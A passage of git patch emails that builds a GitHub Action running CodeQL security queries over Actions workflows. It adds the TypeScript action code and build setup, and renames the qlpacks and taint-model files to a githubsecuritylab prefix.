"sha512-0gv+qLSBLKF0z8TKaSKTsS39scVKF9dbMxJpj3U0vC7wjNWFuIpL/z76Qe2fiuCbDRcJSavkXsVtMS6/dtQQsg==", + "requires": { + "@octokit/request": "^5.6.0", + "@octokit/types": "^6.0.3", + "universal-user-agent": "^6.0.0" + } + }, + "@octokit/openapi-types": { + "version": "12.11.0", + "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-12.11.0.tgz", + "integrity": "sha512-VsXyi8peyRq9PqIz/tpqiL2w3w80OgVMwBHltTml3LmVvXiphgeqmY9mvBw9Wu7e0QWk/fqD37ux8yP5uVekyQ==" + }, + "@octokit/plugin-paginate-rest": { + "version": "2.21.3", + "resolved": "https://registry.npmjs.org/@octokit/plugin-paginate-rest/-/plugin-paginate-rest-2.21.3.tgz", + "integrity": "sha512-aCZTEf0y2h3OLbrgKkrfFdjRL6eSOo8komneVQJnYecAxIej7Bafor2xhuDJOIFau4pk0i/P28/XgtbyPF0ZHw==", + "requires": { + "@octokit/types": "^6.40.0" + } + }, + "@octokit/plugin-rest-endpoint-methods": { + "version": "5.16.2", + "resolved": "https://registry.npmjs.org/@octokit/plugin-rest-endpoint-methods/-/plugin-rest-endpoint-methods-5.16.2.tgz", + "integrity": "sha512-8QFz29Fg5jDuTPXVtey05BLm7OB+M8fnvE64RNegzX7U+5NUXcOcnpTIK0YfSHBg8gYd0oxIq3IZTe9SfPZiRw==", + "requires": { + "@octokit/types": "^6.39.0", + "deprecation": "^2.3.1" + } + }, + "@octokit/request": { + "version": "5.6.3", + "resolved": "https://registry.npmjs.org/@octokit/request/-/request-5.6.3.tgz", + "integrity": "sha512-bFJl0I1KVc9jYTe9tdGGpAMPy32dLBXXo1dS/YwSCTL/2nd9XeHsY616RE3HPXDVk+a+dBuzyz5YdlXwcDTr2A==", + "requires": { + "@octokit/endpoint": "^6.0.1", + "@octokit/request-error": "^2.1.0", + "@octokit/types": "^6.16.1", + "is-plain-object": "^5.0.0", + "node-fetch": "^2.6.7", + "universal-user-agent": "^6.0.0" + } + }, + "@octokit/request-error": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-2.1.0.tgz", + "integrity": "sha512-1VIvgXxs9WHSjicsRwq8PlR2LR2x6DwsJAaFgzdi0JfJoGSO8mYI/cHJQ+9FbN21aa+DrgNLnwObmyeSC8Rmpg==", + "requires": { + "@octokit/types": "^6.0.3", + "deprecation": "^2.0.0", + "once": "^1.4.0" + } + }, + "@octokit/types": { + "version": "6.41.0", + "resolved": "https://registry.npmjs.org/@octokit/types/-/types-6.41.0.tgz", + "integrity": "sha512-eJ2jbzjdijiL3B4PrSQaSjuF2sPEQPVCPzBvTHJD9Nz+9dw2SGH4K4xeQJ77YfTq5bRQ+bD8wT11JbeDPmxmGg==", + "requires": { + "@octokit/openapi-types": "^12.11.0" + } + }, + "@types/node": { + "version": "20.11.19", + "resolved": "https://registry.npmjs.org/@types/node/-/node-20.11.19.tgz", + "integrity": "sha512-7xMnVEcZFu0DikYjWOlRq7NTPETrm7teqUT2WkQjrTIkEgUyyGdWsj/Zg8bEJt5TNklzbPD1X3fqfsHw3SpapQ==", + "dev": true, + "requires": { + "undici-types": "~5.26.4" + } + }, + "@vercel/ncc": { + "version": "0.38.1", + "resolved": "https://registry.npmjs.org/@vercel/ncc/-/ncc-0.38.1.tgz", + "integrity": "sha512-IBBb+iI2NLu4VQn3Vwldyi2QwaXt5+hTyh58ggAMoCGE6DJmPvwL3KPBWcJl1m9LYPChBLE980Jw+CS4Wokqxw==", + "dev": true + }, + "before-after-hook": { + "version": "2.2.3", + "resolved": "https://registry.npmjs.org/before-after-hook/-/before-after-hook-2.2.3.tgz", + "integrity": "sha512-NzUnlZexiaH/46WDhANlyR2bXRopNg4F/zuSA3OpZnllCUgRaOF2znDioDWrmbNVsuZk6l9pMquQB38cfBZwkQ==" + }, + "deprecation": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/deprecation/-/deprecation-2.3.1.tgz", + "integrity": "sha512-xmHIy4F3scKVwMsQ4WnVaS8bHOx0DmVwRywosKhaILI0ywMDWPtBSku2HNxRvF7jtwDRsoEwYQSfbxj8b7RlJQ==" + }, + "is-plain-object": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/is-plain-object/-/is-plain-object-5.0.0.tgz", + "integrity": "sha512-VRSzKkbMm5jMDoKLbltAkFQ5Qr7VDiTFGXxYFXXowVj387GeGNOCsOH6Msy00SGZ3Fp84b1Naa1psqgcCIEP5Q==" + }, + "node-fetch": { + "version": "2.7.0", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", + "integrity": "sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", + "requires": { + "whatwg-url": "^5.0.0" + } + }, + "once": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", + "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", + "requires": { + "wrappy": "1" + } + }, + "prettier": { + "version": "3.2.5", + "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.2.5.tgz", + "integrity": "sha512-3/GWa9aOC0YeD7LUfvOG2NiDyhOWRvt1k+rcKhOuYnMY24iiCphgneUfJDyFXd6rZCAnuLBv6UeAULtrhT/F4A==", + "dev": true + }, + "semver": { + "version": "6.3.1", + "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", + "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==" + }, + "tr46": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", + "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==" + }, + "tunnel": { + "version": "0.0.6", + "resolved": "https://registry.npmjs.org/tunnel/-/tunnel-0.0.6.tgz", + "integrity": "sha512-1h/Lnq9yajKY2PEbBadPXj3VxsDDu844OnaAo52UVmIzIvwwtBPIuNvkjuzBlTWpfJyUbG3ez0KSBibQkj4ojg==" + }, + "typescript": { + "version": "5.3.3", + "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.3.3.tgz", + "integrity": "sha512-pXWcraxM0uxAS+tN0AG/BF2TyqmHO014Z070UsJ+pFvYuRSq8KH8DmWpnbXe0pEPDHXZV3FcAbJkijJ5oNEnWw==", + "dev": true + }, + "undici": { + "version": "5.28.3", + "resolved": "https://registry.npmjs.org/undici/-/undici-5.28.3.tgz", + "integrity": "sha512-3ItfzbrhDlINjaP0duwnNsKpDQk3acHI3gVJ1z4fmwMK31k5G9OVIAMLSIaP6w4FaGkaAkN6zaQO9LUvZ1t7VA==", + "requires": { + "@fastify/busboy": "^2.0.0" + } + }, + "undici-types": { + "version": "5.26.5", + "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-5.26.5.tgz", + "integrity": "sha512-JlCMO+ehdEIKqlFxk6IfVoAUVmgz7cU7zD/h9XZ0qzeosSHmUJVOzSQvvYSYWXkFXC+IfLKSIffhv0sVZup6pA==", + "dev": true + }, + "universal-user-agent": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/universal-user-agent/-/universal-user-agent-6.0.1.tgz", + "integrity": "sha512-yCzhz6FN2wU1NiiQRogkTQszlQSlpWaw8SvVegAc+bDxbzHgh1vX8uIe8OYyMH6DwH+sdTJsgMl36+mSMdRJIQ==" + }, + "uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==" + }, + "webidl-conversions": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", + "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==" + }, + "whatwg-url": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", + "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", + "requires": { + "tr46": "~0.0.3", + "webidl-conversions": "^3.0.0" + } + }, + "wrappy": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", + "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" + } + } +} diff --git a/.github/action/package.json b/.github/action/package.json new file mode 100644 index 00000000000..90512a3163c --- /dev/null +++ b/.github/action/package.json @@ -0,0 +1,48 @@ +{ + "name": "codeql-actions-action", + "version": "0.1.0", + "description": "CodeQL Pack to analyze GitHub Actions and Workflows", + "main": "dist/index.js", + "scripts": { + "bundle": "npm run format:write && npm run package", + "cli": "ts-node src/index.ts", + "ci-test": "jest", + "format:write": "prettier --write **/*.ts", + "format:check": "prettier --check **/*.ts", + "lint": "npx eslint . -c ./.github/linters/.eslintrc.yml", + "package": "ncc build src/index.ts --license licenses.txt", + "package:watch": "npm run package -- --watch", + "test": "(jest && make-coverage-badge --output-path ./badges/coverage.svg) || make-coverage-badge --output-path ./badges/coverage.svg", + "all": "npm run format:write && npm run lint && npm run test && npm run package" + }, + "repository": { + "type": "git", + "url": "git+https://github.com/GitHubSecurityLab/codeql-actions.git" + }, + "exports": { + ".": "./dist/index.js" + }, + "keywords": [ + "codeql", + "security", + "actions" + ], + "author": "Pwntester", + "license": "MIT", + "bugs": { + "url": "https://github.com/GitHubSecurityLab/codeql-actions/issues" + }, + "homepage": "https://github.com/GitHubSecurityLab/codeql-actions#readme", + "dependencies": { + "@actions/core": "^1.10.1", + "@actions/exec": "^1.1.1", + "@actions/github": "^5.1.1", + "@actions/tool-cache": "^2.0.1" + }, + "devDependencies": { + "@types/node": "^20.6.0", + "@vercel/ncc": "^0.38.0", + "prettier": "^3.0.3", + "typescript": "^5.2.2" + } +} diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts new file mode 100644 index 00000000000..eeeef401a52 --- /dev/null +++ b/.github/action/src/codeql.ts @@ -0,0 +1,158 @@ +import * as fs from "fs"; +import * as path from "path"; + +import * as core from "@actions/core"; +import * as toolcache from "@actions/tool-cache"; +import * as github from "@actions/github"; +import * as toolrunner from "@actions/exec/lib/toolrunner"; + +export interface CodeQLConfig { + // The path to the codeql bundle. + path: string; + // The language to use for analysis. + language: string; + // CodeQL pack to use for analysis. + pack: string; + // The codeql suite to use for analysis. + suite: string; + // The source root to use for analysis. + source_root?: string; + // The output file for the SARIF file. + output?: string; +} + +export async function newCodeQL(): Promise { + return { + language: "yaml", + path: await findCodeQL(), + pack: "GitHubSecurityLab/actions-queries", + suite: "codeql-suites/actions-code-scanning.qls", + source_root: core.getInput("source-root"), + output: core.getInput("sarif"), + }; +} + +export async function runCommand( + config: CodeQLConfig, + args: string[], +): Promise { + var bin = path.join(config.path, "codeql"); + let output = ""; + var options = { + listeners: { + stdout: (data: Buffer) => { + output += data.toString(); + }, + }, + }; + + await new toolrunner.ToolRunner(bin, args, options).exec(); + core.debug(`Finished running command :: ${bin} ${args.join(" ")}`); + + return output.trim(); +} + +export async function runCommandJson( + config: CodeQLConfig, + args: string[], +): Promise { + return JSON.parse(await runCommand(config, args)); +} +async function findCodeQL(): Promise { + // check if codeql is in the toolcache + var codeqlPath = await findCodeQlInToolcache(); + if (codeqlPath !== undefined) { + return codeqlPath; + } + // default to the codeql in the path + return "codeql"; +} + +async function findCodeQlInToolcache(): Promise { + const candidates = toolcache + .findAllVersions("CodeQL") + .map((version) => ({ + folder: toolcache.find("CodeQL", version), + version, + })) + .filter(({ folder }) => fs.existsSync(path.join(folder, "pinned-version"))); + + if (candidates.length === 1) { + const candidate = candidates[0]; + core.info(`CodeQL tools found in toolcache: '${candidate.folder}'.`); + core.debug(`CodeQL toolcache version: '${candidate.version}'.`); + + return path.join(candidate.folder, "codeql"); + } + + core.warning(`No CodeQL tools found in toolcache.`); + + return undefined; +} + +export async function downloadPack(codeql: CodeQLConfig): Promise { + try { + await runCommand(codeql, ["pack", "download", codeql.pack]); + return true; + } catch (error) { + core.warning("Failed to download pack from GitHub..."); + } + return false; +} + +export async function codeqlDatabaseCreate( + codeql: CodeQLConfig, +): Promise { + // get runner temp directory for database + var temp = process.env["RUNNER_TEMP"]; + if (temp === undefined) { + temp = "/tmp"; + } + var database_path = path.join(temp, "codeql-actions-db"); + var source_root = + codeql.source_root || process.env["GITHUB_WORKSPACE"] || "./"; + + await runCommand(codeql, [ + "database", + "create", + "--language", + codeql.language, + "--source-root", + source_root, + database_path, + ]); + + return database_path; +} + +export async function codeqlDatabaseAnalyze( + codeql: CodeQLConfig, + database_path: string, +): Promise { + var codeql_output = codeql.output || "codeql-actions.sarif"; + + var cmd = [ + "database", + "analyze", + "--format", + "sarif-latest", + "--sarif-add-query-help", + "--output", + codeql_output, + ]; + + // remote pack or local pack + if (codeql.pack.startsWith("GitHubSecurityLab/")) { + var suite = codeql.pack + ":" + codeql.suite; + } else { + // assume path + var suite = path.join(codeql.pack, codeql.suite); + cmd.push("--search-path", codeql.pack); + } + + cmd.push(database_path, suite); + + await runCommand(codeql, cmd); + + return codeql_output; +} diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts new file mode 100644 index 00000000000..b1a4fc80c64 --- /dev/null +++ b/.github/action/src/index.ts @@ -0,0 +1,61 @@ +import * as path from "path"; +import * as core from "@actions/core"; +import * as cql from "./codeql"; + +/** + * The main function for the action. + * @returns {Promise} Resolves when the action is complete. + */ +export async function run(): Promise { + try { + // set up codeql + var codeql = await cql.newCodeQL(); + + core.debug(`CodeQL CLI found at '${codeql.path}'`); + + await cql.runCommand(codeql, ["version", "--format", "terse"]); + + // check yaml support + var languages = await cql.runCommandJson(codeql, [ + "resolve", + "languages", + "--format", + "json", + ]); + + if (!languages.hasOwnProperty("yaml")) { + core.setFailed("CodeQL Yaml extractor not installed"); + throw new Error("CodeQL Yaml extractor not installed"); + } + + // download pack + core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); + var pack_downloaded = await cql.downloadPack(codeql); + + if (pack_downloaded === false) { + var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); + codeql.pack = path.join(action_path, "ql", "src"); + + core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); + } else { + core.info(`Pack downloaded '${codeql.pack}'`); + } + + core.info("Creating CodeQL database..."); + var database_path = await cql.codeqlDatabaseCreate(codeql); + + core.info("Running CodeQL analysis..."); + var sarif = await cql.codeqlDatabaseAnalyze(codeql, database_path); + + core.info(`SARIF results: '${sarif}'`); + core.setOutput("sarif", sarif); + + core.info("Finished CodeQL analysis"); + } catch (error) { + // Fail the workflow run if an error occurs + if (error instanceof Error) core.setFailed(error.message); + } +} + +// eslint-disable-next-line @typescript-eslint/no-floating-promises +run(); diff --git a/.github/action/tsconfig.json b/.github/action/tsconfig.json new file mode 100644 index 00000000000..c4b7762f9cd --- /dev/null +++ b/.github/action/tsconfig.json @@ -0,0 +1,24 @@ +{ + "$schema": "https://json.schemastore.org/tsconfig", + "compilerOptions": { + "target": "ES2022", + "module": "NodeNext", + "rootDir": "./src", + "moduleResolution": "NodeNext", + "baseUrl": "./", + "sourceMap": true, + "outDir": "./dist", + "noImplicitAny": true, + "esModuleInterop": true, + "forceConsistentCasingInFileNames": true, + "strict": true, + "skipLibCheck": true, + "newLine": "lf" + }, + "exclude": [ + "./dist", + "./node_modules", + "./__tests__", + "./coverage" + ] +} diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml new file mode 100644 index 00000000000..7380ae46d07 --- /dev/null +++ b/.github/workflows/build.yml @@ -0,0 +1,30 @@ +name: Build and Compile Action + +on: + pull_request: + branches: ["master", "develop"] + workflow_dispatch: + +permissions: + contents: read + packages: read + pull-requests: read + +jobs: + action: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - uses: dorny/paths-filter@4512585405083f25c027a35db413c2b3b9006d50 + id: changes + with: + filters: | + src: + - '.github/action/**' + - 'action.yml' + + - name: Run action + if: steps.changes.outputs.src == 'true' + uses: ./ + with: + extractor-version: latest diff --git a/action.yml b/action.yml new file mode 100644 index 00000000000..03054c195be --- /dev/null +++ b/action.yml @@ -0,0 +1,19 @@ +name: "codeql-actions" +description: "CodeQL Pack for GitHub Actions and Workflows" + +inputs: + token: + description: GitHub Token + default: ${{ github.token }} + + source-root: + description: "Path of the root source code directory, relative to $GITHUB_WORKSPACE." + default: "./" + + sarif: + description: "SARIF File Output" + default: "codeql-actions.sarif" + +runs: + using: "node16" + main: ".github/action/dist/index.js" diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 8cf5ba69354..dc4daebaac8 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -1,7 +1,7 @@ --- library: true warnOnImplicitThis: true -name: codeql/actions-all +name: GitHubSecurityLab/actions-all version: 0.0.1-dev dependencies: codeql/controlflow: ^0.1.7 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index f4c43168664..919a244b390 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,6 +1,6 @@ --- library: false -name: codeql/actions-queries +name: GitHubSecurityLab/actions-queries version: 0.0.1 groups: - actions From cf4ab41df2eeb5131a64ec2faadf4832dbfb7635 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 12:32:48 +0100 Subject: [PATCH 0038/1267] feat(action): rename qlpacks to use githubsecuritylab prefix --- .github/action/dist/index.js | 2 +- .github/action/src/codeql.ts | 2 +- ql/lib/qlpack.yml | 2 +- .../codeql-suites/actions-code-scanning.qls | 19 +++++++++++++++++++ ql/src/qlpack.yml | 2 +- 5 files changed, 23 insertions(+), 4 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index e13da63ecda..23c03588162 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28606,7 +28606,7 @@ async function newCodeQL() { return { language: "yaml", path: await findCodeQL(), - pack: "GitHubSecurityLab/actions-queries", + pack: "githubsecuritylab/actions-queries", suite: "codeql-suites/actions-code-scanning.qls", source_root: core.getInput("source-root"), output: core.getInput("sarif"), diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index eeeef401a52..3826737a082 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -25,7 +25,7 @@ export async function newCodeQL(): Promise { return { language: "yaml", path: await findCodeQL(), - pack: "GitHubSecurityLab/actions-queries", + pack: "githubsecuritylab/actions-queries", suite: "codeql-suites/actions-code-scanning.qls", source_root: core.getInput("source-root"), output: core.getInput("sarif"), diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index dc4daebaac8..1ccfae0b278 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -1,7 +1,7 @@ --- library: true warnOnImplicitThis: true -name: GitHubSecurityLab/actions-all +name: githubsecuritylab/actions-all version: 0.0.1-dev dependencies: codeql/controlflow: ^0.1.7 diff --git a/ql/src/codeql-suites/actions-code-scanning.qls b/ql/src/codeql-suites/actions-code-scanning.qls index e69de29bb2d..7d6c94e0c8c 100644 --- a/ql/src/codeql-suites/actions-code-scanning.qls +++ b/ql/src/codeql-suites/actions-code-scanning.qls @@ -0,0 +1,19 @@ +- description: Standard Code Scanning queries for Actions +- queries: . + +- include: + kind: + - problem + - path-problem + tags contain: + - security + - maintainability + +- include: + kind: + - diagnostic + +- exclude: + tags contain: + - experimental + - testing diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 919a244b390..fb5d29fb957 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,6 +1,6 @@ --- library: false -name: GitHubSecurityLab/actions-queries +name: githubsecuritylab/actions-queries version: 0.0.1 groups: - actions From 5d1264d3a4beef372fa972e068a95b9393429a6d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 12:56:06 +0100 Subject: [PATCH 0039/1267] feat(action): update references to qlpacks --- .gitignore | 2 ++ ql/lib/ext/PLACEHOLDER.model.yml | 2 +- ql/lib/ext/ahmadnassri_action-changed-files.model.yml | 2 +- ql/lib/ext/dorny_paths-filter.model.yml | 2 +- ql/lib/ext/frabert_replace-string-action.model.yml | 2 +- ql/lib/ext/jitterbit_get-changed-files.model.yml | 4 ++-- ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml | 2 +- ql/lib/ext/tj-actions_changed-files.model.yml | 4 ++-- ql/lib/ext/tj-actions_verify-changed-files.model.yml | 2 +- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 11 files changed, 14 insertions(+), 12 deletions(-) diff --git a/.gitignore b/.gitignore index 1233930f4a4..e147f87bf72 100644 --- a/.gitignore +++ b/.gitignore @@ -1,2 +1,4 @@ .DS_Store **/*.testproj +ql/lib/.codeql/ +ql/src/.codeql/ diff --git a/ql/lib/ext/PLACEHOLDER.model.yml b/ql/lib/ext/PLACEHOLDER.model.yml index ef916067967..2f549573a53 100644 --- a/ql/lib/ext/PLACEHOLDER.model.yml +++ b/ql/lib/ext/PLACEHOLDER.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sinkModel data: - ["","","",""] diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml index 3308967eebc..8f449f6b26d 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["ahmadnassri/action-changed-files", "*", "output.files", "pull_request", "PR changed files"] diff --git a/ql/lib/ext/dorny_paths-filter.model.yml b/ql/lib/ext/dorny_paths-filter.model.yml index d2b2ed48fc5..6ee41e93826 100644 --- a/ql/lib/ext/dorny_paths-filter.model.yml +++ b/ql/lib/ext/dorny_paths-filter.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["dorny/paths-filter", "*", "output.changes", "pull_request", "PR changed files"] diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml index 79fd5c76e4a..760b7cd46e7 100644 --- a/ql/lib/ext/frabert_replace-string-action.model.yml +++ b/ql/lib/ext/frabert_replace-string-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint"] diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml index bc7344eedca..f19a2da37f5 100644 --- a/ql/lib/ext/jitterbit_get-changed-files.model.yml +++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["jitterbit/get-changed-files", "*", "output.all", "pull_request", "PR changed files"] @@ -16,4 +16,4 @@ extensions: - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request_target", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request_target", "PR changed files"] \ No newline at end of file + - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml index 332527813a4..bddfb8e67fa 100644 --- a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml +++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint"] diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml index b3b8baed7fc..fc5557db6ea 100644 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ b/ql/lib/ext/tj-actions_changed-files.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["tj-actions/changed-files", "*", "output.added_files", "pull_request", "PR changed files"] @@ -36,4 +36,4 @@ extensions: - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request_target", "PR changed files"] - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"] \ No newline at end of file + - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/tj-actions_verify-changed-files.model.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml index 408abfbb8d0..76d83bd249e 100644 --- a/ql/lib/ext/tj-actions_verify-changed-files.model.yml +++ b/ql/lib/ext/tj-actions_verify-changed-files.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["tj-actions/verify-changed-files", "*", "output.changed-files", "pull_request", "PR changed files"] diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 1ccfae0b278..3c344549245 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.1-dev +version: 0.0.1 dependencies: codeql/controlflow: ^0.1.7 codeql/yaml: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index fb5d29fb957..346079df984 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -9,6 +9,6 @@ suites: codeql-suites extractor: yaml defaultSuiteFile: codeql-suites/actions-code-scanning.qls dependencies: - codeql/actions-all: ${workspace} + githubsecuritylab/actions-all: ${workspace} warnOnImplicitThis: true tests: test From 959a974c8b848176a6c2416f93afb4ab370761d5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 13:32:05 +0100 Subject: [PATCH 0040/1267] feat(action): clone pack (not use the registry) --- .github/action/dist/index.js | 83 +++++++++++++++++++++++++++++++++++- .github/action/src/codeql.ts | 1 - .github/action/src/gh.ts | 54 +++++++++++++++++++++++ .github/action/src/index.ts | 13 +++++- 4 files changed, 148 insertions(+), 3 deletions(-) create mode 100644 .github/action/src/gh.ts diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 23c03588162..9c0a19375f4 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28716,6 +28716,79 @@ async function codeqlDatabaseAnalyze(codeql, database_path) { exports.codeqlDatabaseAnalyze = codeqlDatabaseAnalyze; +/***/ }), + +/***/ 1772: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + var desc = Object.getOwnPropertyDescriptor(m, k); + if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) { + desc = { enumerable: true, get: function() { return m[k]; } }; + } + Object.defineProperty(o, k2, desc); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.clonePackRepo = exports.runCommandJson = exports.runCommand = exports.newGHConfig = void 0; +const path = __importStar(__nccwpck_require__(1017)); +const core = __importStar(__nccwpck_require__(2186)); +const toolrunner = __importStar(__nccwpck_require__(8159)); +async function newGHConfig() { + return { + path: "", + }; +} +exports.newGHConfig = newGHConfig; +async function runCommand(config, args) { + var bin = path.join(config.path, "gh"); + let output = ""; + var options = { + listeners: { + stdout: 